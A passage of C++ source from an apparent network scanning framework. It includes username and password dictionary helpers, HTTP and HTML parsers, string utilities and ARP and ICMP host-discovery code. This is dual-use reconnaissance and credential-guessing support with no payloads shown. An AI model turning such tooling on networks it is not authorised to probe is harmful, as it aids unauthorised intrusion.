resolve_dictionary_open(const string username_path,const string password_path); 40 | 41 | bool resolve_dictionary_is_empty(const dictionary& in_dictionary); 42 | unsigned int resolve_dictionary_get_user_count(const dictionary& in_dictionary); 43 | username_list resolve_dictionary_get_user_list(const dictionary& in_dictionary); 44 | unsigned int resolve_dictionary_get_password_count(const dictionary& in_dictionary); 45 | password_list resolve_dictionary_get_password_list(const dictionary& in_dictionary,const string username); 46 | void resolve_dictionary_add_username(dictionary& in_dictionary,const string username); 47 | void resolve_dictionary_add_password(dictionary& in_dictionary,const string password); 48 | void resolve_dictionary_add_password(dictionary& in_dictionary,const password_list password); 49 | 50 | #endif 51 | -------------------------------------------------------------------------------- /scanner_framework/resolver_express.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include 7 | 8 | #include "encoder_base64.h" 9 | #include "resolver_express.h" 10 | #include "resolver_string.h" 11 | 12 | 13 | typedef vector arg_list; 14 | 15 | 16 | string resolve_express_http(const string express) { 17 | string result; 18 | split_result split(split_string(express,find_string(express,";"))); 19 | 20 | if (split.second.empty()) 21 | return split.first; 22 | 23 | string format_string(split.first); 24 | left_move_string(split.second,1); 25 | string arg_string(split.second); 26 | split=split_string(split.second,find_string(split.second,",")); 27 | arg_list list; 28 | 29 | while (!split.second.empty()) { 30 | list.push_back(split.first); 31 | left_move_string(split.second,1); 32 | split=split_string(split.second,find_string(split.second,",")); 33 | } 34 | list.push_back(split.first); 35 | 36 | string element; 37 | string element_name,element_value; 38 | unsigned int arg_index=0; 39 | split=split_string(format_string,find_string(format_string,",")); 40 | 41 | while (!split.second.empty()) { 42 | element=split.first; 43 | split_result element_split(split_string(element,find_string(element,":"))); 44 | left_move_string(element_split.second,1); 45 | element_name=element_split.first; 46 | element_value=element_split.second; 47 | 48 | if (-1!=find_string(element_value,"%")) { 49 | left_move_string(element_value,find_string(element_value,"%")+1);// TIPS : There is no Get Type .. 50 | // But I dont want to use it .. 51 | element_value=list[arg_index]; 52 | ++arg_index; 53 | } 54 | result+=element_name; 55 | result+=":"; 56 | result+=element_value; 57 | result+="\r\n"; 58 | left_move_string(split.second,1); 59 | split=split_string(split.second,find_string(split.second,",")); 60 | } 61 | split_result element_split(split_string(split.first,find_string(split.first,":"))); 62 | left_move_string(element_split.second,1); 63 | element_name=element_split.first; 64 | element_value=element_split.second; 65 | 66 | if (-1!=find_string(element_value,"%")) { 67 | left_move_string(element_value,find_string(element_value,"%")+1);// TIPS : There is no Get Type .. 68 | // But I dont want to use it .. 69 | element_value=list[arg_index]; 70 | ++arg_index; 71 | } 72 | result+=element_name; 73 | result+=":"; 74 | result+=element_value; 75 | result+="\r\n\r\n"; 76 | 77 | return result; 78 | } 79 | 80 | static long ramdon(long down,long up) { 81 | srand(GetTickCount()); 82 | return down+(rand()*(up-down)/32768); 83 | } 84 | 85 | /* 86 | 87 | function(123123)|function(321312) 88 | function(function(313213123)) 89 | 90 | function:rnd arg:[down-up] 91 | rnd([1-100]) 92 | 93 | */ 94 | 95 | static const string function_rnd("rnd"); 96 | static const string function_time("time"); 97 | static const string function_len("len"); 98 | static const string function_base64("base64"); 99 | 100 | static bool resolve_express_is_function_name(const string function_name) { 101 | if (!function_name.empty()) 102 | if (-1==find_string(function_name,"(") && 103 | -1==find_string(function_name,")") && 104 | -1==find_string(function_name,"-") && 105 | -1==find_string(function_name,"|") && 106 | -1==string_to_number(function_name)) 107 | return true; 108 | return false; 109 | } 110 | 111 | static bool resolve_express_is_function(const string express) { 112 | split_result split(split_string(express,"(")); 113 | string function_name(split.first),function_arg(separate_string(express,"(",")")); 114 | 115 | if (resolve_express_is_function_name(function_name) && !function_arg.empty()) 116 | return true; 117 | return false; 118 | } 119 | 120 | string resolve_express_function(const string express) { 121 | if (!resolve_express_is_function(express)) return ""; 122 | 123 | split_result split(split_string(express,"|")); 124 | string function(split.first),next_function(split.second); 125 | left_move_string(next_function,1); 126 | string result; 127 | 128 | while (!function.empty()) { 129 | if (!resolve_express_is_function(function)) return function; 130 | 131 | split=split_string(function,"("); 132 | string function_name(upper_string(split.first)),function_arg(separate_string(function,"(",")")); 133 | 134 | if (function_rnd==function_name) { 135 | function_arg=separate_string(function_arg,"[","]"); 136 | string down,up; 137 | split=split_string(function_arg,"-"); 138 | if (1 9 | 10 | using std::string; 11 | 12 | #endif 13 | 14 | 15 | /* 16 | 17 | element_name_1:element_value_1,element_name_2:element_value_2,element_name_3:%string%,element_name_4:%value%;string,value 18 | 19 | */ 20 | 21 | string resolve_express_http(const string express); 22 | 23 | /* 24 | 25 | function(123123)|function(321312) 26 | function(function(313213123)) 27 | 28 | function:rnd arg:[down-up] 29 | rnd([1-100]) 30 | 31 | */ 32 | 33 | string resolve_express_function(const string express); 34 | string resolve_express(const string express); 35 | 36 | 37 | #endif 38 | 39 | -------------------------------------------------------------------------------- /scanner_framework/resolver_html.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include "resolver_html.h" 5 | #include "resolver_string.h" 6 | 7 | 8 | #define HTML_TAG_NAME "HTML_TAG_NAME" 9 | #define HTML_TAG_SUBTAG "HTML_TAG_SUBTAG" 10 | 11 | 12 | bool resolve_html_is_empty(const tag& in_tag) { 13 | if (in_tag.first.empty()) 14 | return true; 15 | return false; 16 | } 17 | 18 | string resolve_html_get_tag_name(const tag& in_tag) { 19 | tag_data::const_iterator find_iterator=in_tag.first.find(HTML_TAG_NAME); 20 | 21 | if (find_iterator!=in_tag.first.end()) 22 | return find_iterator->second; 23 | return ""; 24 | } 25 | 26 | void resolve_html_set_tag_name(tag& in_tag,const string tag_name) { 27 | in_tag.first[HTML_TAG_NAME]=tag_name; 28 | } 29 | 30 | string resolve_html_get_tag_subtag(const tag& in_tag) { 31 | tag_data::const_iterator find_iterator=in_tag.first.find(HTML_TAG_SUBTAG); 32 | 33 | if (find_iterator!=in_tag.first.end()) 34 | return find_iterator->second; 35 | return ""; 36 | } 37 | 38 | void resolve_html_set_tag_subtag(tag& in_tag,const string tag_subtag) { 39 | in_tag.first[HTML_TAG_SUBTAG]=tag_subtag; 40 | } 41 | 42 | unsigned int resolve_html_get_tag_element_count(const tag& in_tag) { 43 | return in_tag.second.size(); 44 | } 45 | 46 | tag_element_list resolve_html_get_tag_element_list(const tag& in_tag) { 47 | tag_element_list list; 48 | 49 | for (tag_element::const_iterator iterator=in_tag.second.begin(); 50 | iterator!=in_tag.second.end(); 51 | ++iterator) 52 | list.push_back(iterator->first); 53 | return list; 54 | } 55 | 56 | string resolve_html_get_tag_element(const tag& in_tag,const string element_name) { 57 | tag_element::const_iterator find_iterator=in_tag.second.find(element_name); 58 | 59 | if (find_iterator!=in_tag.second.end()) 60 | return find_iterator->second; 61 | return ""; 62 | } 63 | 64 | void resolve_html_set_tag_element(tag& in_tag,const string element_name,const string element_value) { 65 | in_tag.second[element_name]=element_value; 66 | } 67 | 68 | void resolve_html_delete_tag_element(tag& in_tag,const string element_name) { 69 | tag_element::const_iterator find_iterator=in_tag.second.find(element_name); 70 | 71 | if (find_iterator!=in_tag.second.end()) 72 | in_tag.second.erase(element_name); 73 | } 74 | 75 | tag resolve_html_to_tag(const string in_string) { 76 | tag result; 77 | string resolve_string(in_string); 78 | unsigned int left_flag_front=find_string(in_string,"<"); 79 | unsigned int right_flag_front=find_string(in_string,">"); 80 | 81 | if (-1!=left_flag_front && -1!=right_flag_front) { 82 | unsigned int left_flag_back=in_string.find_last_of(""); 83 | 84 | if (-1!=left_flag_back && -1!=right_flag_back) { 85 | string first_tag,last_tag; 86 | split_result split(split_string(in_string,right_flag_front)); 87 | first_tag=split.first; 88 | left_move_string(first_tag,left_flag_front+1); 89 | split=split_string(in_string,left_flag_back+1); 90 | last_tag=split.second; 91 | split=split_string(last_tag,last_tag.find_last_of(">")); 92 | last_tag=split.first; 93 | if (-1!=find_string(first_tag," ")) { 94 | split=split_string(first_tag,find_string(first_tag," ")); 95 | first_tag=split.first; 96 | } 97 | 98 | if (first_tag==last_tag) { 99 | resolve_html_set_tag_name(result,first_tag); 100 | 101 | string resolve_string(separate_string(in_string,left_flag_front+1,right_flag_front-1)); 102 | left_move_string(resolve_string,first_tag.length()); 103 | left_remove_space(resolve_string); 104 | right_remove_space(resolve_string); 105 | 106 | if (!resolve_string.empty()) { 107 | unsigned int space_offset=find_string(resolve_string," "); 108 | 109 | while (-1!=space_offset) { 110 | split=split_string(resolve_string,space_offset); 111 | resolve_string=split.second; 112 | left_move_string(resolve_string,1); 113 | string element(split.first); 114 | split=split_string(element,find_string(element,"=")); 115 | string element_name(split.first),element_value(split.second); 116 | right_remove_space(element_name); 117 | left_move_string(element_value,1); 118 | left_remove_space(element_value); 119 | left_remove(element_value,"\""); 120 | right_remove(element_value,"\""); 121 | resolve_html_set_tag_element(result,element_name,element_value); 122 | space_offset=find_string(resolve_string," "); 123 | } 124 | string element(resolve_string); 125 | split=split_string(element,find_string(element,"=")); 126 | string element_name(split.first),element_value(split.second); 127 | right_remove_space(element_name); 128 | left_move_string(element_value,1); 129 | left_remove_space(element_value); 130 | left_remove(element_value,"\""); 131 | right_remove(element_value,"\""); 132 | resolve_html_set_tag_element(result,element_name,element_value); 133 | } 134 | 135 | resolve_string=separate_string(in_string,right_flag_front+1,left_flag_back-right_flag_front-2); 136 | if (!resolve_string.find("\r\n")) 137 | left_move_string(resolve_string,2); 138 | if (-1!=resolve_string.find_last_of("\r\n")) 139 | split=split_string(resolve_string,resolve_string.find_last_of("\r\n")); 140 | 141 | resolve_html_set_tag_subtag(result,resolve_string); 142 | } 143 | } 144 | } 145 | return result; 146 | } 147 | 148 | tag resolve_html_to_tag(const tag in_tag) { 149 | string subtag(resolve_html_get_tag_subtag(in_tag)); 150 | return resolve_html_to_tag(subtag); 151 | } 152 | 153 | string resolve_html_to_string(const tag& in_tag) { 154 | string result; 155 | 156 | result="<"; 157 | result+=resolve_html_get_tag_name(in_tag); 158 | result+=" "; 159 | 160 | tag_element_list list(resolve_html_get_tag_element_list(in_tag)); 161 | for (unsigned int index=0,last_index=resolve_html_get_tag_element_count(in_tag);index 9 | 10 | using std::string; 11 | 12 | #endif 13 | 14 | #ifndef _PAIR_ 15 | #define _PAIR_ 16 | 17 | using std::pair; 18 | 19 | #endif 20 | 21 | #ifndef _MAP_ 22 | 23 | #include 24 | 25 | using std::map; 26 | 27 | #endif 28 | 29 | #ifndef _VECTOR_ 30 | 31 | #include 32 | 33 | using std::vector; 34 | 35 | #endif 36 | 37 | 38 | #define HTML_TAG_NAME "HTML_TAG_NAME" 39 | #define HTML_TAG_SUBTAG "HTML_TAG_SUBTAG" 40 | 41 | typedef map tag_data; // tag_name,tag_subtag 42 | typedef map tag_element; // all tag element 43 | typedef vector tag_element_list; 44 | typedef pair tag; 45 | 46 | 47 | tag resolve_html_to_tag(const string in_string); 48 | tag resolve_html_to_tag(const tag in_tag); 49 | string resolve_html_to_string(const tag& in_tag); 50 | 51 | bool resolve_html_is_empty(const tag& in_tag); 52 | string resolve_html_get_tag_name(const tag& in_tag); 53 | void resolve_html_set_tag_name(tag& in_tag,const string tag_name); 54 | string resolve_html_get_tag_subtag(const tag& in_tag); 55 | void resolve_html_set_tag_subtag(tag& in_tag,const string tag_subtag); 56 | unsigned int resolve_html_get_tag_element_count(const tag& in_tag); 57 | tag_element_list resolve_html_get_tag_element_list(const tag& in_tag); 58 | string resolve_html_get_tag_element(const tag& in_tag,const string element_name); 59 | void resolve_html_set_tag_element(tag& in_tag,const string element_name,const string element_value); 60 | void resolve_html_delete_tag_element(tag& in_tag,const string element_name); 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /scanner_framework/resolver_http.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include "resolver_http.h" 5 | #include "resolver_string.h" 6 | 7 | #define HTTP_HEADER_LINE "\r\n" 8 | #define HTTP_HEADER_END "\r\n\r\n" 9 | 10 | unsigned int resolve_http_get_element_count(const http_packet& output_packet) { 11 | return output_packet.size(); 12 | } 13 | 14 | http_packet_element_list resolve_http_get_element_list(const http_packet& output_packet) { 15 | http_packet_element_list list; 16 | for (http_packet::const_iterator iterator=output_packet.begin(); 17 | iterator!=output_packet.end(); 18 | ++iterator) 19 | list.push_back(iterator->first); 20 | return list; 21 | } 22 | 23 | string resolve_http_get_element(const http_packet& output_packet, string element_name) { 24 | http_packet::const_iterator find_iterator=output_packet.find(element_name); 25 | if (find_iterator!=output_packet.end()) 26 | return find_iterator->second; 27 | return ""; 28 | } 29 | 30 | void resolve_http_set_element(http_packet& output_packet,const string element_name,const string element_value) { 31 | output_packet[element_name]=element_value; 32 | } 33 | 34 | void resolve_http_delete_element(http_packet& output_packet,const string element_name) { 35 | http_packet::const_iterator find_iterator=output_packet.find(element_name); 36 | if (find_iterator!=output_packet.end()) 37 | output_packet.erase(element_name); 38 | } 39 | 40 | http_packet resolve_http_to_packet(const string http_header_string) { 41 | http_packet result; 42 | 43 | split_result split(split_string(http_header_string,find_string(http_header_string,HTTP_HEADER_END))); 44 | string resolve_string(split.first); 45 | 46 | while (true) { 47 | split_result line(split_string(resolve_string,find_string(resolve_string,HTTP_HEADER_LINE))); 48 | 49 | if (-1!=find_string(line.first,"HTTP/")) { 50 | split_result http_information(split_string(line.first,find_string(line.first," "))); 51 | string http_mode(http_information.first); 52 | left_remove_space(http_information.second); 53 | http_information=split_string(http_information.second,find_string(http_information.second," ")); 54 | string http_path(http_information.first); 55 | left_remove_space(http_information.second); 56 | left_move_string(http_information.second,5); 57 | right_remove_space(http_information.second); 58 | string http_version(http_information.second); 59 | resolve_http_set_element(result,HTTP_HEADER_MODE,http_mode); 60 | resolve_http_set_element(result,HTTP_HEADER_PATH,http_path); 61 | resolve_http_set_element(result,HTTP_HEADER_VERSION,http_version); 62 | left_move_string(line.second,2); 63 | resolve_string=line.second; 64 | continue; 65 | } 66 | 67 | split_result element(split_string(line.first,find_string(line.first,":"))); 68 | left_move_string(element.second,1); 69 | left_remove_space(element.second); 70 | right_remove_space(element.second); 71 | left_remove_space(element.first); 72 | right_remove_space(element.first); 73 | resolve_http_set_element(result,element.first,element.second); 74 | left_move_string(line.second,2); 75 | resolve_string=line.second; 76 | if (-1==find_string(resolve_string,HTTP_HEADER_LINE)) { 77 | element=split_string(resolve_string,find_string(line.first,":")); 78 | left_remove_space(element.second); 79 | right_remove_space(element.second); 80 | resolve_http_set_element(result,element.first,element.second); 81 | break; 82 | } 83 | } 84 | return result; 85 | } 86 | 87 | string resolve_http_to_string(const http_packet& input_packet) { 88 | if (input_packet.empty()) return ""; 89 | string null_string,string_mode(HTTP_HEADER_MODE),string_path(HTTP_HEADER_PATH),string_version(HTTP_HEADER_VERSION),string_context(HTTP_CONTEXT); 90 | 91 | if (null_string==resolve_http_get_element(input_packet,HTTP_HEADER_MODE) || 92 | null_string==resolve_http_get_element(input_packet,HTTP_HEADER_PATH) || 93 | null_string==resolve_http_get_element(input_packet,HTTP_HEADER_VERSION)) return ""; 94 | 95 | string result,context; 96 | unsigned int element_count=resolve_http_get_element_count(input_packet); 97 | http_packet_element_list element(resolve_http_get_element_list(input_packet)); 98 | 99 | result=resolve_http_get_element(input_packet,HTTP_HEADER_MODE); 100 | result+=" "; 101 | result+=resolve_http_get_element(input_packet,HTTP_HEADER_PATH); 102 | result+=" HTTP/"; 103 | result+=resolve_http_get_element(input_packet,HTTP_HEADER_VERSION); 104 | result+=HTTP_HEADER_LINE; 105 | 106 | for (unsigned int index=0;index 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _PAIR_ 14 | #define _PAIR_ 15 | 16 | using std::pair; 17 | 18 | #endif 19 | 20 | #ifndef _MAP_ 21 | 22 | #include 23 | 24 | using std::map; 25 | 26 | #endif 27 | 28 | #ifndef _VECTOR_ 29 | 30 | #include 31 | 32 | using std::vector; 33 | 34 | #endif 35 | 36 | 37 | #define HTTP_HEADER_MODE "HTTP_MODE" 38 | #define HTTP_HEADER_PATH "HTTP_PATH" 39 | #define HTTP_HEADER_VERSION "HTTP_VERSION" 40 | #define HTTP_CONTEXT "HTTP_CONTEXT" 41 | 42 | typedef map http_packet; 43 | typedef vector http_packet_element_list; 44 | 45 | http_packet resolve_http_to_packet(const string http_header_string); 46 | string resolve_http_to_string(const http_packet& output_packet); 47 | http_packet resolve_http_combind(const http_packet& http_packet_1,const http_packet& http_packet_2); 48 | 49 | unsigned int resolve_http_get_element_count(const http_packet& output_packet); 50 | http_packet_element_list resolve_http_get_element_list(const http_packet& output_packet); 51 | string resolve_http_get_element(const http_packet& output_packet,const string element_name); 52 | void resolve_http_set_element(http_packet& output_packet,const string element_name,const string element_value); 53 | void resolve_http_delete_element(http_packet& output_packet,const string element_name); 54 | 55 | #endif 56 | -------------------------------------------------------------------------------- /scanner_framework/resolver_string.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include "resolver_string.h" 7 | 8 | 9 | unsigned int find_string(const string in_string,const string find_string) { 10 | return (unsigned int)in_string.find(find_string); 11 | } 12 | 13 | unsigned int find_last_string(const string in_string,const string find_string) { 14 | return (unsigned int)in_string.find_last_of(find_string); 15 | } 16 | 17 | split_result split_string(const string in_string,unsigned int split_point) { 18 | split_result result; 19 | 20 | if (split_point<=in_string.length()) { 21 | result.first=in_string.substr(0,split_point); 22 | result.second=in_string.substr(split_point,in_string.length()); 23 | } else 24 | result.first=in_string; 25 | return result; 26 | } 27 | 28 | split_result split_string(const string in_string,const string split_string_) { 29 | return split_string(in_string,find_string(in_string,split_string_)); 30 | } 31 | 32 | split_block_result split_block(const string in_string,const string split_string_) { 33 | split_block_result result; 34 | 35 | if (!in_string.empty()) { 36 | split_result block; 37 | block.second=in_string; 38 | 39 | while (-1!=find_string(block.second,split_string_)) { 40 | block=split_string(block.second,split_string_); 41 | left_move_string(block.second,1); 42 | 43 | if (!block.first.empty()) 44 | result.push_back(block.first); 45 | } 46 | result.push_back(block.second); 47 | } 48 | 49 | return result; 50 | } 51 | 52 | void erase_string(string& in_string,unsigned int erase_point,unsigned int erase_length) { 53 | if (in_string.empty()) return; 54 | if (!(in_string.length()>=erase_point+erase_length)) return; 55 | 56 | string output_string(in_string.substr(0,erase_point)); 57 | output_string+=in_string.substr(erase_point+erase_length,in_string.length()); 58 | in_string=output_string; 59 | } 60 | 61 | unsigned int count_string(string in_string,const string find_string_) { 62 | unsigned int next_point=find_string(in_string,find_string_),count=0; 63 | while (-1!=next_point) { 64 | in_string=in_string.substr(next_point+1,in_string.length()); 65 | ++count;next_point=find_string(in_string,find_string_); 66 | } 67 | return count; 68 | } 69 | 70 | void left_move_string(string& in_string,unsigned int move_offset) { 71 | if (in_string.empty()) return; 72 | in_string=in_string.substr(move_offset,in_string.length()); 73 | } 74 | 75 | void right_move_string(string& in_string,unsigned int move_offset) { 76 | if (in_string.empty()) return; 77 | in_string=in_string.substr(move_offset,in_string.length()-move_offset); 78 | } 79 | 80 | void left_remove(string& in_string,const string remove_string) { 81 | if (in_string.empty()) return; 82 | unsigned int find_index=0; 83 | 84 | while (!(find_index=in_string.find(remove_string))) 85 | in_string=in_string.substr(1,in_string.length()); 86 | } 87 | void right_remove(string& in_string,const string remove_string) { 88 | if (in_string.empty()) return; 89 | unsigned int find_index=0; 90 | 91 | while (in_string.length()==(find_index=in_string.find_last_of(remove_string)+1)) 92 | in_string=in_string.substr(0,in_string.length()-1); 93 | } 94 | 95 | void left_remove_space(string& in_string) { 96 | left_remove(in_string," "); 97 | } 98 | 99 | void right_remove_space(string& in_string) { 100 | right_remove(in_string," "); 101 | } 102 | 103 | string separate_string(const string in_string,const string left_string,const string right_string) { 104 | if (-1==find_string(in_string,left_string) || -1==find_string(in_string,right_string)) 105 | return ""; 106 | 107 | split_result split(split_string(in_string,find_string(in_string,left_string)+1)); 108 | return split_string(split.second,find_last_string(split.second,right_string)).first; 109 | } 110 | 111 | string separate_string(const string in_string,const unsigned int split_offset,const unsigned int separete_length) { 112 | split_result split(split_string(in_string,split_offset)); 113 | 114 | return split_string(split.second,separete_length).first; 115 | } 116 | 117 | void replace_string(string& in_string,const string source_string,const string dest_string) { 118 | unsigned int offset=find_string(in_string,source_string); 119 | unsigned int length=source_string.length(); 120 | if (-1!=offset && length) { 121 | split_result split(split_string(in_string,source_string)); 122 | in_string=split.first; 123 | in_string+=dest_string; 124 | left_move_string(split.second,length); 125 | in_string+=split.second; 126 | } 127 | } 128 | 129 | string upper_string(const string in_string) { 130 | string result; 131 | 132 | for (string::const_iterator iterator=in_string.begin(); 133 | iterator!=in_string.end(); 134 | ++iterator) { 135 | char char_=*iterator; 136 | if ('A'<=char_ && char_<='Z') 137 | char_+=32; 138 | result+=char_; 139 | } 140 | return result; 141 | } 142 | 143 | string number_to_string(long in_number) { 144 | string result; 145 | char link_string[16]={0}; 146 | sprintf(link_string,"%ld",in_number); 147 | result=link_string; 148 | return result; 149 | } 150 | 151 | long string_to_number(const char* input_string) { 152 | long return_number=0; 153 | try { 154 | for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) { 155 | if (48<=*input_string && *input_string<=57) 156 | return_number+=(*input_string-48)*pow(10,number_index); 157 | else 158 | return -1; 159 | } 160 | } catch (...) { 161 | return -1; 162 | } 163 | return return_number; 164 | } 165 | 166 | long string_to_number(const string& input_string) { 167 | return string_to_number(input_string.c_str()); 168 | } 169 | -------------------------------------------------------------------------------- /scanner_framework/resolver_string.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _RESOLVER_STRING_H__ 3 | #define _RESOLVER_STRING_H__ 4 | 5 | #ifndef _STRING_ 6 | 7 | #include 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _PAIR_ 14 | #define _PAIR_ 15 | 16 | using std::pair; 17 | 18 | #endif 19 | 20 | #ifndef _VECTOR_ 21 | 22 | #include 23 | 24 | using std::vector; 25 | 26 | #endif 27 | 28 | typedef vector split_block_result; 29 | typedef pair split_result; 30 | 31 | 32 | unsigned int find_string (const string in_string,const string find_string); 33 | unsigned int find_last_string (const string in_string,const string find_string); 34 | split_result split_string (const string in_string,unsigned int split_point); 35 | split_result split_string (const string in_string,const string split_string); 36 | split_block_result split_block (const string in_string,const string split_string); 37 | void erase_string (string& in_string,unsigned int erase_point,unsigned int erase_length); 38 | unsigned int count_string (string in_string,const string find_string); 39 | void left_move_string (string& in_string,unsigned int move_offset); 40 | void right_move_string (string& in_string,unsigned int move_offset); 41 | void left_remove_space (string& in_string); 42 | void right_remove_space(string& in_string); 43 | void left_remove (string& in_string,const string remove_string); 44 | void right_remove (string& in_string,const string remove_string); 45 | string separate_string (const string in_string,const string left_string,const string right_string); 46 | string separate_string (const string in_string,const unsigned int split_offset,const unsigned int separete_length); 47 | void replace_string (string& in_string,const string source_string,const string dest_string); 48 | 49 | string upper_string(const string in_string); 50 | 51 | string number_to_string(long in_number); 52 | long string_to_number(const char* input_string); 53 | long string_to_number(const string& input_string); 54 | 55 | #endif 56 | -------------------------------------------------------------------------------- /scanner_framework/route_design.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/route_design.png -------------------------------------------------------------------------------- /scanner_framework/scan_arp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | #include 5 | 6 | #include "local_network.h" 7 | #include "scan_arp.h" 8 | 9 | #pragma comment (lib,"wpcap") 10 | 11 | #define ETH_ADDRESS_LENGTH 6 12 | #define ETH_PROTO_ARP 0x806 13 | #define ETH_TRAILER_LENGTH 0x12 14 | 15 | #pragma pack(1) 16 | 17 | typedef struct { 18 | unsigned char dest[ETH_ADDRESS_LENGTH]; 19 | unsigned char source[ETH_ADDRESS_LENGTH]; 20 | unsigned short proto; 21 | } eth,*point_eth; 22 | 23 | typedef struct { 24 | USHORT arp_hrd; 25 | USHORT arp_pro; 26 | UCHAR arp_hln; 27 | UCHAR arp_pln; 28 | USHORT arp_op; 29 | UCHAR arp_sha[6]; 30 | ULONG arp_spa; 31 | UCHAR arp_tha[6]; 32 | ULONG arp_tpa; 33 | } arp,*point_arp; 34 | 35 | #pragma pack(4) 36 | 37 | static pcap_t* adapter=NULL; 38 | 39 | bool scan_arp_init(void) { 40 | char buffer[64]={0}; 41 | pcap_if_t *devsin; 42 | pcap_if_t *d; 43 | int i=0; 44 | char errorbuf[PCAP_ERRBUF_SIZE]={0}; 45 | 46 | if (pcap_findalldevs(&devsin, errorbuf) == -1) 47 | return false; 48 | 49 | for(d=devsin, i=0; i< ADAPTER_INDEX-1 ;d=d->next, i++); 50 | 51 | if ((adapter= pcap_open_live(d->name, 65536, 1,1000, errorbuf )) == NULL) 52 | return false; 53 | 54 | return true; 55 | } 56 | 57 | void scan_arp_clean(void) { 58 | pcap_close(adapter); 59 | } 60 | 61 | bool scan_arp(const char* targe_ip,char* output_mac) { 62 | char send_packet[ARP_PING_SEND_BUFFER_LENGTH]={0}; 63 | 64 | point_eth peth=(point_eth)send_packet; 65 | peth->dest[0]=0xFF; 66 | peth->dest[1]=0xFF; 67 | peth->dest[2]=0xFF; 68 | peth->dest[3]=0xFF; 69 | peth->dest[4]=0xFF; 70 | peth->dest[5]=0xFF; 71 | memcpy(&peth->source,local_mac,ETH_ADDRESS_LENGTH); 72 | peth->proto=htons(ETH_PROTO_ARP); 73 | 74 | point_arp parp=(point_arp)(send_packet+sizeof(eth)); 75 | parp->arp_hrd=htons(0x0001); 76 | parp->arp_pro=htons(0x0800); 77 | parp->arp_hln=0x6; 78 | parp->arp_pln=0x4; 79 | parp->arp_op=htons(0x0001); 80 | memcpy(&parp->arp_sha,local_mac,ETH_ADDRESS_LENGTH); 81 | parp->arp_spa=inet_addr(local_ip); 82 | parp->arp_tha[0]=0x00; 83 | parp->arp_tha[1]=0x00; 84 | parp->arp_tha[2]=0x00; 85 | parp->arp_tha[3]=0x00; 86 | parp->arp_tha[4]=0x00; 87 | parp->arp_tha[5]=0x00; 88 | parp->arp_tpa=inet_addr(targe_ip); 89 | 90 | char* eth_trailer=(char*)(send_packet+sizeof(eth)+sizeof(arp)); 91 | for (int i=0;iarp_spa==inet_addr(targe_ip)) { 107 | memcpy(output_mac,parp->arp_sha,ETH_ADDRESS_LENGTH); 108 | return true; 109 | } 110 | new_tick=GetTickCount(); 111 | } while ((new_tick-old_tick)<=ARP_PING_WAIT_TIME); 112 | 113 | return false; 114 | } 115 | -------------------------------------------------------------------------------- /scanner_framework/scan_arp.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_ARP_H__ 3 | #define _SCAN_ARP_H__ 4 | 5 | #define ADAPTER_INDEX 1 6 | 7 | #define ARP_PING_SEND_BUFFER_LENGTH 512 8 | 9 | #define ARP_PING_WAIT_TIME 200 10 | 11 | bool scan_arp_init(void); 12 | bool scan_arp(const char* targe_ip,char* output_mac); 13 | void scan_arp_clean(void); 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /scanner_framework/scan_icmp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include 7 | #include 8 | 9 | #include "scan_icmp.h" 10 | 11 | #define ICMP_TTL_TRANSIT 11013 12 | 13 | typedef unsigned long IPAddr; 14 | 15 | typedef struct ip_option_information { 16 | UCHAR Ttl; 17 | UCHAR Tos; 18 | UCHAR Flags; 19 | UCHAR OptionsSize; 20 | PUCHAR OptionsData; 21 | } IP_OPTION_INFORMATION, *PIP_OPTION_INFORMATION; 22 | 23 | typedef struct icmp_echo_reply { 24 | IPAddr Address; 25 | ULONG Status; 26 | ULONG RoundTripTime; 27 | USHORT DataSize; 28 | USHORT Reserved; 29 | PVOID Data; 30 | struct ip_option_information Options; 31 | } ICMP_ECHO_REPLY, *PICMP_ECHO_REPLY; 32 | 33 | typedef DWORD (__stdcall *IcmpSendEcho)(HANDLE,IPAddr,LPVOID,WORD,PIP_OPTION_INFORMATION,LPVOID,DWORD,DWORD); 34 | typedef HANDLE (__stdcall *IcmpCreateFile)(void); 35 | typedef BOOL (__stdcall *IcmpCloseHandle)(HANDLE); 36 | 37 | static HMODULE lModl=NULL; 38 | 39 | static IcmpCreateFile fIcmpCreateFile=NULL; 40 | static IcmpSendEcho fIcmpSendEcho=NULL; 41 | static IcmpCloseHandle fIcmpCloseHandle=NULL; 42 | static HANDLE fHandle=INVALID_HANDLE_VALUE; 43 | 44 | bool scan_icmp_init(void) { 45 | lModl=(HMODULE)LoadLibrary ("iphlpapi.dll"); 46 | if (lModl==NULL) 47 | return false; 48 | else{ 49 | fIcmpCreateFile=(IcmpCreateFile)GetProcAddress (lModl,"IcmpCreateFile"); 50 | fIcmpSendEcho=(IcmpSendEcho)GetProcAddress (lModl,"IcmpSendEcho"); 51 | fIcmpCloseHandle=(IcmpCloseHandle)GetProcAddress (lModl,"IcmpCloseHandle"); 52 | if (fIcmpCreateFile==NULL || fIcmpSendEcho==NULL || fIcmpCloseHandle==NULL) 53 | return false; 54 | 55 | fHandle=fIcmpCreateFile(); 56 | return true; 57 | } 58 | } 59 | 60 | bool scan_icmp(const char* target_ip,reply* output_information) { 61 | IPAddr pAddr; 62 | pAddr=(IPAddr)inet_addr ((char *)target_ip); 63 | icmp_echo_reply pData; 64 | memset(&pData,0,sizeof(icmp_echo_reply)); 65 | bool Rtn=false; 66 | int state=0; 67 | reply output={0}; 68 | output.count=ICMP_PING_LOOP_COUNT; 69 | 70 | for (int i=0;i=2) Rtn=true; 87 | 88 | return Rtn; 89 | } 90 | 91 | ping_list scan_icmp_list(const char* 